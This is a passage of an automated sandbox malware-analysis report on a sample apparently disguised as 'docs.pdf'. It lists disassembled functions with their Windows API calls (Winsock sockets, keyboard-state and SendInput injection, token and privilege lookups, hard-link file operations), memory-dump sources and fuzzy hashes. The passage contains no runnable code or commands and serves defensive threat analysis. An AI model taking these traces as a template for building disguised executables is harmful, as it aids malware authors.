                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: 59490cc020c81b5abd009e17fd50144523f50105c14c536ced3720b39f30c36a
                                                            • Instruction ID: 0c093e2e9984694a16627f3710a3857397f680c3a8fa6fba675f7ce9bbf0b8dd
                                                            • Opcode Fuzzy Hash: 59490cc020c81b5abd009e17fd50144523f50105c14c536ced3720b39f30c36a
                                                            • Instruction Fuzzy Hash: E6C15A75A083019FC714DF28C88096ABBE4FF88714F148A6DF99A9B351D770E956CF82
                                                            Function 001683A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 001683D8
                                                            • CoUninitialize.OLE32 ref: 001683E3
                                                              • Part of subcall function 0014DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0014DAC5
                                                            • VariantInit.OLEAUT32(?), ref: 001683EE
                                                            • VariantClear.OLEAUT32(?), ref: 001686BF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: e645f286c21ff00e2566052a25398098a18b4983f273b8c85e34693b890722cb
                                                            • Instruction ID: 343c013621486bec3e87e862568c0936f8d9949a035d85f37a0ccdd8fd6a5267
                                                            • Opcode Fuzzy Hash: e645f286c21ff00e2566052a25398098a18b4983f273b8c85e34693b890722cb
                                                            • Instruction Fuzzy Hash: A4A189752047019FCB10DF28C881B6AB7E4BF88354F15854CFA9A9B7A2CB70EC54DB82
                                                            Function 00147A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00182C7C,?), ref: 00147C32
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00182C7C,?), ref: 00147C4A
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0017FB80,000000FF,?,00000000,00000800,00000000,?,00182C7C,?), ref: 00147C6F
                                                            • _memcmp.LIBCMT ref: 00147C90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID:
                                                            • API String ID: 314563124-0
                                                            • Opcode ID: be6953942dc1b3bf2fd56e0b76a515fe373c753b99d2836bf81acfc94b737153
                                                            • Instruction ID: d7af4477b29be058a6653a01b7a583b8365d4a320c6960059be6ebe7ae9aff10
                                                            • Opcode Fuzzy Hash: be6953942dc1b3bf2fd56e0b76a515fe373c753b99d2836bf81acfc94b737153
                                                            • Instruction Fuzzy Hash: 25812B71A0010AEFCB04DF94C984EEEB7B9FF89315F204599E505AB260DB71AE46CB61
                                                            Function 00146DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: c66cb365216e779afe5a66e2b6d2da873cb9f5844afdaa639458df30ef7a04d2
                                                            • Instruction ID: e24fbef0aa5ee99b0ffeefd3017aaf86c63ac037dbfef3ee30a7c478fb5d3baa
                                                            • Opcode Fuzzy Hash: c66cb365216e779afe5a66e2b6d2da873cb9f5844afdaa639458df30ef7a04d2
                                                            • Instruction Fuzzy Hash: A351CB306043019BDB24AF65E495B7AB3E5EF5A310F20881FF596DB6F2DB7098849B12
                                                            Function 00179A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(00E9E638,?), ref: 00179AD2
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00179B05
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00179B72
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: 32f6a98f4b9cd4ac0187980f260f57f6d332628cfd56d15e83a39cc9e2684b46
                                                            • Instruction ID: dcddd0c0a1cf7cb22e36bced4fefa85fe24f7befe1afaf6ac0501f68be55a994
                                                            • Opcode Fuzzy Hash: 32f6a98f4b9cd4ac0187980f260f57f6d332628cfd56d15e83a39cc9e2684b46
                                                            • Instruction Fuzzy Hash: A6512D35A00209EFCF14DF68D881DAE7BB6FF55320F148269F9199B2A0D730AD85CB90
                                                            Function 00166CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00166CE4
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166CF4
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00166D58
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166D64
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: c3b9fc7f886cd560d12ec7f82c9613f8fbede84f74dd486673c12679984c59e5
                                                            • Instruction ID: 67d2c61e8a0a73ee441e20b631722e9ed33f85b0bf1403104db63131f7c527a7
                                                            • Opcode Fuzzy Hash: c3b9fc7f886cd560d12ec7f82c9613f8fbede84f74dd486673c12679984c59e5
                                                            • Instruction Fuzzy Hash: 8A41BF74740204AFEB24AF24DC86FBA77E9AB04B10F44801CFB599B6D3DB759C419B91
                                                            Function 0016672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0017F910), ref: 001667BA
                                                            • _strlen.LIBCMT ref: 001667EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: 979ea2f2f8d9ca42ea0e08985460e93cee502234ec2473a5d23c2059b17e2676
                                                            • Instruction ID: dde8b652cf1c4853017094236915586dbee47b87ff21ae0da87268ffd6f40768
                                                            • Opcode Fuzzy Hash: 979ea2f2f8d9ca42ea0e08985460e93cee502234ec2473a5d23c2059b17e2676
                                                            • Instruction Fuzzy Hash: 8341D531A00208ABCB14EB74DCC1FFEB7ADAF18314F148169FA1997292DB30AD51C791
                                                            Function 0015BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0015BB09
                                                            • GetLastError.KERNEL32(?,00000000), ref: 0015BB2F
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0015BB54
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0015BB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 5e96ac03c0bc2c84c8888f28a7c1bb1479bc0732fbf59b94a4213c8ff5f301f7
                                                            • Instruction ID: 94e2e24035baace06c6edb927fac123a5fac7280e0f94481ecda457d75fe3274
                                                            • Opcode Fuzzy Hash: 5e96ac03c0bc2c84c8888f28a7c1bb1479bc0732fbf59b94a4213c8ff5f301f7
                                                            • Instruction Fuzzy Hash: E9413539204614DFCB10EF18C584AA9BBF1EF89310B098488ED5A9FB62CB70FD45DB91
                                                            Function 00178AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00178B4D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 99e20eca8132f5c8765def2b249cf302c7c1cb5c75a48d6e1b7dd2b612aa9eb2
                                                            • Instruction ID: 89ae46da0f33c162953ff614082724d2493a78c51640f7583fc255f360e401e4
                                                            • Opcode Fuzzy Hash: 99e20eca8132f5c8765def2b249cf302c7c1cb5c75a48d6e1b7dd2b612aa9eb2
                                                            • Instruction Fuzzy Hash: 353194B4680204BEEB249E28CC9DFA93775EB09310F64C616FA59D76E1CF31A9809751
                                                            Function 0017ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 0017AE1A
                                                            • GetWindowRect.USER32(?,?), ref: 0017AE90
                                                            • PtInRect.USER32(?,?,0017C304), ref: 0017AEA0
                                                            • MessageBeep.USER32(00000000), ref: 0017AF11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 9c757994a2bebf91e51ffbb26e8273796213fb4cba0132e668213c7ae5491b2f
                                                            • Instruction ID: 957ed385616e8f4ea219aceec00fb01e624952643e283100d4b260ea56145cd6
                                                            • Opcode Fuzzy Hash: 9c757994a2bebf91e51ffbb26e8273796213fb4cba0132e668213c7ae5491b2f
                                                            • Instruction Fuzzy Hash: 4A416D71600219DFCB11CF58C884AAD7BF5FF99350F54C1A9E41D9B251DB30A982DB92
                                                            Function 00150FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00151037
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00151053
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001510B9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0015110B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 84078023c9e8e79bc02042354f275e4e8e34662ebfca637fa9bf5145ca40e612
                                                            • Instruction ID: 6eeccaa292ef7385c72fff5a6e3c7f9970667d49292bd1ef14305e54f859826e
                                                            • Opcode Fuzzy Hash: 84078023c9e8e79bc02042354f275e4e8e34662ebfca637fa9bf5145ca40e612
                                                            • Instruction Fuzzy Hash: 73313930E40698FEFB368A65CC05BFEBBA9AB48312F04431AFDA45A1D1C37489C99751
                                                            Function 00151121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00151176
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00151192
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 001511F1
                                                            • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00151243
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 4d135b1c9aeea583bd8cbab2e2d6e06e4b526a15296ea48d1824c8f91d0f5952
                                                            • Instruction ID: 514d40b6a1b80c7a8445de91e2e85d80ce872cb1667b72d4de30a958d0d0fded
                                                            • Opcode Fuzzy Hash: 4d135b1c9aeea583bd8cbab2e2d6e06e4b526a15296ea48d1824c8f91d0f5952
                                                            • Instruction Fuzzy Hash: CD316B30940A08FEEF268A75CC047FA7BBAAB59312F14439EF9B19A1D1C3744D8D8751
                                                            Function 00126415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0012644B
                                                            • __isleadbyte_l.LIBCMT ref: 00126479
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001264A7
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001264DD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 8a6d7c7c8a734da27de827a20b955b7786e1705f3521a6a5c484047d961e2067
                                                            • Instruction ID: dab22eb3b265c056d8bf72abdc4b89c9e02bb18d5f185614b5fae214e78a427a
                                                            • Opcode Fuzzy Hash: 8a6d7c7c8a734da27de827a20b955b7786e1705f3521a6a5c484047d961e2067
                                                            • Instruction Fuzzy Hash: F631C1316042A6EFDB25AF65EC45BBA7BB5FF40320F154029F8A4871D1E731D8A1DB90
                                                            Function 00175175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00175189
                                                              • Part of subcall function 0015387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00153897
                                                              • Part of subcall function 0015387D: GetCurrentThreadId.KERNEL32 ref: 0015389E
                                                              • Part of subcall function 0015387D: AttachThreadInput.USER32(00000000,?,001552A7), ref: 001538A5
                                                            • GetCaretPos.USER32(?), ref: 0017519A
                                                            • ClientToScreen.USER32(00000000,?), ref: 001751D5
                                                            • GetForegroundWindow.USER32 ref: 001751DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: b3105f2028e4792597a51737db2249f6174bb1d1ae01632f1193364141491495
                                                            • Instruction ID: b7d683045d7341b6040e492a76c6951424b3efb5df7f65ba47aa77cbb70eb357
                                                            • Opcode Fuzzy Hash: b3105f2028e4792597a51737db2249f6174bb1d1ae01632f1193364141491495
                                                            • Instruction Fuzzy Hash: 58310D71900108AFDB04EFA5CC85AEFB7F9EF98304F10406AE515E7252EA759E45CBA1
                                                            Function 0017C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • GetCursorPos.USER32(?), ref: 0017C7C2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0012BBFB,?,?,?,?,?), ref: 0017C7D7
                                                            • GetCursorPos.USER32(?), ref: 0017C824
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0012BBFB,?,?,?), ref: 0017C85E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: 2551b2ffecbeaa9992a0dff40f51d9dff9a2a8d814454fb0d8e4299d3592aca3
                                                            • Instruction ID: 62c258072cfe5d15cd4956b1d0e7e4d015a701e9c3bf2d7ee6e18994e0275dfa
                                                            • Opcode Fuzzy Hash: 2551b2ffecbeaa9992a0dff40f51d9dff9a2a8d814454fb0d8e4299d3592aca3
                                                            • Instruction Fuzzy Hash: 30319F35600118AFCB15CF58C898EEABBBAEB49710F04816DF9098B661C7359E91DFA1
                                                            Function 00148B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00148652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00148669
                                                              • Part of subcall function 00148652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00148673
                                                              • Part of subcall function 00148652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00148682
                                                              • Part of subcall function 00148652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00148689
                                                              • Part of subcall function 00148652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0014869F
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00148BEB
                                                            • _memcmp.LIBCMT ref: 00148C0E
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00148C44
                                                            • HeapFree.KERNEL32(00000000), ref: 00148C4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: ce340c19acc9982c7e741c16f66ce0b9591f23ccc48fa4c1017e9d1e51e60053
                                                            • Instruction ID: 4b8514149b99375ef22897d4cdcd637886b0fc1803c621912718282a3d1a3c7b
                                                            • Opcode Fuzzy Hash: ce340c19acc9982c7e741c16f66ce0b9591f23ccc48fa4c1017e9d1e51e60053
